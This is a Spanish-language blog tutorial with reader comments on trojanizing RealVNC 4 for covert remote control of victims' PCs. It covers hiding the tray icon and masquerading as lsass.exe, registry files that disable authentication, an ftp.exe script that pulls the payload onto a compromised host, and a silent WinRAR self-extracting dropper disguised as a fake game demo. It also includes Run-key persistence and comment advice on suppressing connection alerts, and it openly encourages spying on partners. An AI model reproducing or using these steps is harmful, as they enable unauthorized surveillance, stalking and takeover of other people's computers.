viernes, 22 de junio de 2007

TROYANIZANDO REAL VNC 4

TROYANIZANDO REAL VNC 4




Materiales:
Servidor FTP (cualquiera)
WinVNC4
ResHacker

Acá aprenderemos a troyanizar el realvnc4 de diferentes maneras, pero lo primero será ocultar el fastidioso icono negro con blanco que se muestra al lado de la hora y que nos delata cuando el realvnc está activo… lo haremos con el ResHacker borrando los recursos de iconos e imágenes y todo aquellos que nos pueda delatar:



Si no quieres complicarte la vida puedes bajarlo desde http://512.iespana.es/vnc ya compilado y todo, y por último lo renombramos a “lsass.exe” aprovechándonos de una vulnerabilidad del administrador de tareas que dice que lsass.exe no puede detenerse XD.

Ahora suponiendo que estamos dentro de una shell… lo vamos a subir por ftp.
Abrimos nuestro servidor FTP y configuramos el nombre de usuario y contraseña:




Debe aparecer un icono así:

Ahora vamos a configurar nuestro troyano de dos formas… una es para ver solamente el escritorio de la victima sin que se de cuenta y otra para tomar el control total sin que pueda hacer nada jajaja que malo :p . Para esto necesitamos hacer una entrada de registro de la siguiente manera:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\RealVnc\WinVNC4]
"SecurityTypes"="None"
"ReverseSecurityTypes"="None"
"DisconnectAction"="None"
"QueryConnect"=dword:00000000
"QueryOnlyIfLoggedOn"=dword:00000000
"LocalHost"=dword:00000000
"Hosts"=dword:00000000
"AcceptKeyEvents"=dword:00000000
"AcceptPointerEvents"=dword:00000000
"AcceptCutText"=dword:00000000
"SendCutText"=dword:00000000
"DisableLocalInputs"=dword:00000000
"DisconnectClients"=dword:00000000
"AlwaysShared"=dword:00000000
"NeverShared"=dword:00000000
"RemoveWallpaper"=dword:00000000
"DisableEffects"=dword:00000000
"UpdateMethod"=dword:00000001
"PollConsoleWindows"=dword:00000001
"UseCaptureBlt"=dword:00000001
"UseHooks"=dword:00000001
"Protocol3.3"=dword:00000000

Copias todo esto y lo pegas en el block de notas y lo guardas como “vm.tmp” que significa “View Mode” … si quieres manejar el escritorio de la victima entonces pega este otro texto:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\RealVnc\WinVNC4]
"SecurityTypes"="None"
"ReverseSecurityTypes"="None"
"DisconnectAction"="None"
"QueryConnect"=dword:00000000
"QueryOnlyIfLoggedOn"=dword:00000000
"LocalHost"=dword:00000000
"Hosts"="0,"
"AcceptKeyEvents"=dword:00000001
"AcceptPointerEvents"=dword:00000001
"AcceptCutText"=dword:00000001
"SendCutText"=dword:00000001
"DisableLocalInputs"=dword:00000001
"DisconnectClients"=dword:00000000
"AlwaysShared"=dword:00000000
"NeverShared"=dword:00000000
"RemoveWallpaper"=dword:00000001
"DisableEffects"=dword:00000000
"UpdateMethod"=dword:00000001
"PollConsoleWindows"=dword:00000001
"UseCaptureBlt"=dword:00000001
"UseHooks"=dword:00000001
"Protocol3.3"=dword:00000000
"PortNumber"=dword:0000170c
"IdleTimeout"=dword:00000e10
"HTTPPortNumber"=dword:000016a8
"RemovePattern"=dword:00000000

Y lo guardas como “ct.tmp” que significa “Control Total” .

Ahora subiremos las configuraciones y el vnc desde nuestra shell usando el comando ftp.exe de la siguiente forma:



La idea es que atraves del comando echo hagamos un texto con los comandos que ejecutará ftp.exe de la siguiente manera:

Echo o >> ftp.txt
Echo 192.168.1.69 >> ftp.txt En este caso 192.168.1.69 es nuestra IP como servidor FTP
Echo user >> ftp.txt Este es el usuario del FTP
Echo pass >> ftp.txt Este es el password del FTP
Echo get lsass.exe >> ftp.txt Este es nuestro VNC4
Echo get wm_hooks.dll >> ftp.txt
Echo get logmessages.dll >> ftp.txt
Echo get vm.tmp >> ftp.txt Si solamente miramos usamos “vm” si controlamos usamos “ct”
Echo quit >> ftp.txt

Ahora ejecutamos el comando para que nos suba todo: ftp –s:ftp.txt y ahora que ya tenemos todo importamos el registro que hicimos de la siguiente manera: reg import vm.tmp o reg import ct.tmp en el caso de que queramos controlar o solo mirar.

Ahora que ya tenemos nuestro troyano listo y configurado, vamos a proceder a ejecutarlo de la siguiente manera:

Lsass.exe –register
Lsass.exe –start



Ahora que nuestro troyano está corriendo como servicio, estamos listos para entrar con nuestro cliente:



Donde dice 127.0.0.1 es la IP de la victima que tiene el troyano.
Si te fijas… ya no aparece ningun icono que delate su existencia y Aunque pinches con el boton primario o secundario del Mouse (boton derecho e isquierdo) no aparece nada:



Ahora lo haremos de otra forma… lo daremos como carnada sin estar dentro de una shell usando Winrar.

Materiales:
Winrar
RealVNC4

Ahora seleccionaremos lo siguiente y lo comprimiremos:



Y procedemos a compilar nuestro troyano:

1: Crearemos un archivo “sfx”…



2: Vamos a la pestaña “Avanzado y pinchamos en “Opciones SFX”



3: En carpeta de extracción ponemos “%homedrive%%homepath%\update” y en “ejecutar tras la extracción” ponemos “setup” (después explicaremos porque)



4: En la ficha “Modo” seleccionamos “Ocultar todo” y “Omitir ficheros existentes” para evitar errores futuros y que ademas no muestre nada, ya que queremos que sea lo mas silencioso posible no?.



5: En “Texto e icono” donde dice abajo: “Cargar icono SFX desde fichero” buscamos un icono a elección… en mi caso le puse el de un juego llamado “Max Peine” y presionamos aceptar una sola vez.



6: En “comentario aparecerá un texto que dice en un lado: Setup=setup y reemplazamos eso por lo siguiente:

Setup="%windir%\system32\cmd.exe" /c reg import "%homedrive%%homepath%\update\vm.tmp"
Setup=lasaa.exe -noconsole -register
Setup=lasaa.exe -noconsole -start



Fijarse que es una sola linea por cada setup. Ahora me diran que es esto?... ps explico:

Setup="%windir%\system32\cmd.exe" /c reg import %homedrive%%homepath%\update\vm.tmp" // Importamos la configuracion de nuestro troyano
Setup=lasaa.exe -noconsole –register // Registramos el troyano para que se ejecute en modo SYSTEM
Setup=lasaa.exe -noconsole –start // Iniciamos el troyano

Ahora damos aceptar a todo y debe aparecer algo asi:


En mi caso le puse el icono de Max Peine para decirle a mi querido y buen amigo llamado “Victima” que es el demo de MAX PEINE III (obviamente inexistente) y al abrirlo sucederá lo mismo que el primer ejemplo:



Sin icono alguno y nos conectamos con nuestro cliente:



Obviamente 127.0.0.1 debe ir la IP de la victima.

Ahora puedes saber si tu novia te pone los cuernos o darle el susto de su vida al que siempre te ha jodido controlando su pc XD.
Nota: Puedes añadir entradas de registros extras para hacer que se ejecute cada ves que inicie la pc o hacer lo que se te la gana.

Las aplicaciones y el video está en http://512.iespana.es/vnc

Att. Yan
Unilola Software.

Notas del bloger

  • 1) Se puede crear un bat con las siguientes caracteristicas:

    1- la primera kita el dichoso iconito.

    2- la segunda desabilita la autentificación.

    3- la tercera hace que se inicie el sistema.

    reg add hklm\SOFTWARE\ORL\WinVNC3 /v DisableTrayIcon /t reg_dword /d 1 /f

    reg add hklm\SOFTWARE\ORL\WinVNC3 /v authrequired /t reg_dword /d 0 /f

    reg add hklm\software\microsoft\windows\currentversion\run /v dllhost.exe /t reg_sz /d winvnc.exe /f

6 comentarios:

Anónimo dijo...

Excelente

Javier dijo...

Hola amigo, no se si me puedes ayudar en la configuración del realvnc, el problema que tengo es:

El icono que oculta el vnc ya lo puedo ocultar pero hay un mensaje que sale que se conecto un usuario a este equipo el que no puedo borrar, como elimino ese mensaje para que no vean que me conecte.

El mensaje sale al conectarse y al desconectarse del VNC, como lo elimino

Gracias si me puedes ayudar

Grave dijo...

Hola, lo ke tienes ke hacer es usar un depurador de ensamblador, como ollydbg, para evitar ke aparesca el mensaje... (ha!, tengras ke tener almenos conocimientos basicos del ensamblador :P)

Anónimo dijo...

Hola de nuevo
Lo que me escribiste de como puedo eliminar utilizando el ollydbg es algo muy sofisticado, para poder eliminar ese mensaje, pero te agradezco muchísimo la ayuda, que ria preguntarte si existe otra forma o un programa mas fácil para poder eliminar ese mensaje.

Gracias por tu ayuda

ky0l3r dijo...

Excelente tuto!
habia hace tiempo uno por la red de algo similar, pero o estaba incompleto u obsoleto, o los archivos necesarios (vnc Server sin "tray icon") ya no estaban disponibles.
Me gusta este porque esta muy completo y explica bien eso de quitar el icono, aunque igual se ve un poco sospechoso ese "hueco" =D.

En lo personal yo uso el ThightVnc y un pequeño script en vbs para ocultar el icono (funciona perfecto!)

en si solo agrega al registro la clave de "DisableTrayIcon" como tipo "Dword" y listo! control total y sin icono!
(por si a alguien le sirve; mi vbs es este:

Set Regedit = CreateObject("WScript.Shell")
Regedit.regWrite "HKLM\SOFTWARE\ORL\WinVNC3\DisableTrayIcon", 1, "REG_DWORD"


Gracias por todo, un saludo!

Anónimo dijo...

Hola buenas, es posible que al acceder al ordenador no se vea el icono del Vnc en negro?.
muchas gracias.